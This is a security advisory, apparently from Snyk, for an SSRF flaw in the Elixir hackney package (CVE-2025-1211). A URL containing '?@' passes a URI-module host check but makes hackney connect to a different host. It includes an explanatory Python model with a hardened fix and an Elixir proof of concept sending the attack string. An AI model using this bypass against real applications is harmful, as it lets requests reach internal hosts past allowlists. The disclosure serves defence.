Server-side Request Forgery (SSRF) Affecting hackney package, versions >=0.0.0


Severity: medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of concept

  • Snyk ID: SNYK-HEX-HACKNEY-6516131
  • published: 10 Feb 2025
  • disclosed: 13 Mar 2024
  • credit: Sam Sanoop

Introduced: 13 Mar 2024

CVE-2025-1211
CWE-918
First added by Snyk

How to fix?

There is no fixed version for hackney.

Overview

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) because Elixir's built-in URI module and hackney parse URLs differently. Given the URL http://127.0.0.1?@127.2.2.2/, URI.parse/1 ends the authority at the ? and reports the host as 127.0.0.1 (which is correct), whereas hackney does not stop at the ?, treats everything before the @ as userinfo, and sends the request to 127.2.2.2. An application that validates the destination host with the URI module (for example, against an allowlist of permitted hosts) and then passes the original string to hackney, or to a library built on it such as HTTPoison, therefore has its host check bypassed.
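The parser differential behind this advisory, as an added example in Python; this is not code from the advisory or from hackney. rfc3986_host() uses Python's urlsplit, which ends the authority at the first /, ? or # exactly as Elixir's URI.parse/1 does. lenient_host() is a simplified reconstruction of the lenient behaviour the advisory attributes to hackney (netloc cut at the first /, then userinfo split at @); it is an assumption for illustration, not hackney's implementation. naive_check() is the flawed pattern the overview describes, and vetted_url() is one hardened alternative: validate, then rebuild the URL the client receives from the validated components. The allowlist and all function names are hypothetical.

```python
"""
Parser-differential model of the SSRF described above.

Added example, not code from the advisory or from hackney. lenient_host()
is an assumed, simplified model of the lenient parsing the advisory
describes; it is not hackney's code. ALLOWED_HOSTS is a hypothetical allowlist.
"""
from urllib.parse import urlsplit, urlunsplit

ATTACK_URL = "http://127.0.0.1?@127.2.2.2/"   # the advisory's attack string
ALLOWED_HOSTS = {"127.0.0.1"}                  # hypothetical allowlist


def rfc3986_host(url: str):
    """Host as a standards-following parser reports it: the authority ends at
    the first '/', '?' or '#', so the '@' inside the query is never seen."""
    return urlsplit(url).hostname


def lenient_host(url: str) -> str:
    """Assumed model of a lenient client parser: cut the netloc at the first
    '/', then treat everything before the last '@' as userinfo. The '?' is
    never considered a delimiter, so the query text becomes part of the host."""
    _scheme, _sep, rest = url.partition("://")
    netloc, _sep, _path = rest.partition("/")
    if "@" in netloc:
        _userinfo, _sep, netloc = netloc.rpartition("@")
    host, _sep, _port = netloc.partition(":")
    return host


def naive_check(url: str, allowed=ALLOWED_HOSTS) -> bool:
    """The flawed pattern: validate with the RFC parser, then hand the
    original, unchanged string to the HTTP client."""
    return rfc3986_host(url) in allowed


def vetted_url(url: str, allowed=ALLOWED_HOSTS):
    """Hardened pattern: validate, then rebuild the URL from the validated
    components so the client cannot read the authority differently.
    Userinfo is rejected outright and an explicit '/' path is always emitted,
    which leaves nothing but the checked host and port before the first '/'.
    Returns the rebuilt URL, or None if the request must be refused."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None
    if parts.username is not None or parts.password is not None:
        return None
    host = parts.hostname
    if host is None or host not in allowed:
        return None
    try:
        port = parts.port            # raises ValueError on a malformed port
    except ValueError:
        return None
    if ":" in host:                  # IPv6 literal needs its brackets back
        host = f"[{host}]"
    netloc = host if port is None else f"{host}:{port}"
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, parts.fragment))


if __name__ == "__main__":
    print("URI-style host  :", rfc3986_host(ATTACK_URL))   # 127.0.0.1
    print("lenient host    :", lenient_host(ATTACK_URL))   # 127.2.2.2
    print("naive check     :", naive_check(ATTACK_URL))    # True, so the check is bypassed
    safe = vetted_url(ATTACK_URL)
    print("vetted URL      :", safe)                       # http://127.0.0.1/?@127.2.2.2/
    print("lenient host now:", lenient_host(safe))         # 127.0.0.1
```

The rebuild defeats this particular delimiter confusion because the explicit / path leaves only the checked host and port in front of the first /. The more general rule is to validate with the same parser the client will use, or to resolve and pin the destination yourself and give the client only that; a host check made with one parser says nothing about where a differently behaving client will connect.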

PoC

# Run inside a Mix project that depends on hackney (e.g. `iex -S mix`),
# then call MyApp.parse_and_print_url/0.

defmodule MyApp do

  # Parse the attack string with Elixir's URI module, print the host it
  # reports, then hand the same string to hackney, which connects elsewhere.
  def parse_and_print_url() do
    attack_string = "http://127.0.0.1?@127.2.2.2/"
    uri = URI.parse(attack_string)

    # URI.parse/1 ends the authority at the "?", so the host is 127.0.0.1
    IO.puts("Host: #{uri.host}")
    IO.puts("Port: #{uri.port}")

    # :httpc (OTP built-in) sends the request to the right host, 127.0.0.1
    # :inets.start()
    # {:ok, {{_, 200, _}, _, body}} =
    #   :httpc.request(:get, {String.to_charlist(attack_string), []}, [], body_format: :binary)
    # IO.puts("Response body: #{body}")

    # HTTPoison, which wraps hackney, sends the request to 127.2.2.2
    # HTTPoison.start()
    # HTTPoison.get!(attack_string)

    # hackney itself sends the request to 127.2.2.2
    {:ok, _started} = Application.ensure_all_started(:hackney)
    :hackney.get(attack_string, [], "", async: :once)
  end
end
